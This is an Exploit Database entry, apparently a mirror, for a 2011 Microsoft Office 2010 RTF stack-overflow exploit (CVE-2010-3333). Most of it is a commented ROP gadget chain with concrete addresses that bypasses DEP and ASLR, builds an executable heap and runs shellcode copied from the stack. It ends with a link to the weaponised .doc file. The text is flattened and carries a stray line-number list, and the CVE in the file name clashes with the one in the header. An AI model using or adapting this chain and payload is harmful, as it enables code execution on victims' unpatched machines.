Microsoft Office 2010 – ‘.RTF’ Header Stack Overflow

• Exploit Database
• 500 阅读

• 作者： Snake
  日期： 2011-07-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17474/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  # Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit # Date: 7/3/2011 # Author: Snake ( Shahriyar.j < at > gmail ) # Version: MS Office <= 2010 # Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7 # CVE : CVE-2010-3333   # This is the exploit I wrote for Abysssec "The Arashi" article. # It gracefully bypass DEP/ASLR in MS Office 2010, # and we named this method "Ikazuchi DEP/ASRL Bypass" : > # unfortunately msgr3en.dll loads a few seconds after opining office, # so just need to open open Office , and then open exploit after a few second and saw a nice calc. # # The Arashi : http://abysssec.com/files/The_Arashi.pdf # http://www.exploit-db.com/docs/17469.pdf # # me : twitter.com/ponez # aslo check here for Persian docs of this methods and more : # http://www.0days.ir/article/       # # and the Rop :   3F2CB9E0POP ECX RETN # HeapCreate() IAT = 3F10115C   3F389CA5MOV EAX,DWORD PTR DS:[ECX] RETN # EAX == HeapCreate() Address   3F39AFCFCALL EAX RETN # Call HeapCreate() and Create a Executable Heap :D # after this call, EAX contain our Heap Address.   0x3F2CB9E0POP ECX RETN # pop 0x00008000 into ECX   0x3F39CB46ADD EAX,ECX POP ESI RETN # add ECX to EAX and instead of calling HeapAlloc, # now EAX point to the RWX Heap :D   0x3F2CB9E0 POP ECX RETN # pop 0x3F3B3DC0 into ECX, it is a writable address.   0x3F2233CC MOV DWORD PTR DS:[ECX],EAX RETN # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)   0x3F2D59DF POP EAX ADD DWORD PTR DS:[EAX],ESP RETN # pop 0x3F3B3DC4 into EAX , it is writable address with zero! # then we add ESP to the Zero which result in storing ESP into that address, # we need ESP address for copying shellcode ( which stores in Stack ), # and we have to get it dynamically at run-time, now with my tricky instruction, we have it!     0x3F2F18CCPOP EAX RETN # pop 0x3F3B3DC4 ( ESP address ) into EAX     0x3F2B745E MOV ECX,DWORD PTR DS:[EAX] RETN # now ECX point to nearly offset of Stack.   0x3F39795EPOP EDX RETN # pop 0x00000024 into EDX   0x3F39CB44ADD ECX,EDX ADD EAX,ECX POP ESI RETN # add 0x24 to ECX ( Stack address )   0x3F398267 MOV EAX,ECX RETN # EAX = ECX ; )   0x3F3A16DEMOV DWORD PTR DS:[ECX],EAX XOR EAX,EAX POP ESI RETN # mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location, # and the popping it into ESI ! now ESI point where shellcode stores in stack :D   0x3F398267 MOV EAX,ECX RETN # EAX = ECX ; )   3F2CB9E0POP ECX RETN # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX   0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX] RETN # now EAX point to our RWX Heap   0x3F2B0A7C XCHG EAX,EDI RETN 4 # EDI = Our RWX Heap Address     3F2CB9E0POP ECX RETN # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX   0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX] RETN # now EAX point to our RWX Heap   0x3F38BEFB ADD AL,58 RETN # just skip some junks ; )   3F2CB9E0POP ECX RETN # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )   3F3441B4REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] POP EDI POP ESI RETN # Copy shellcode from stack into RWX Heap     3F39AFCF CALL EAX RETN # KABOOM !!!           Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17474.doc (cve-2011-3333_exploit.doc)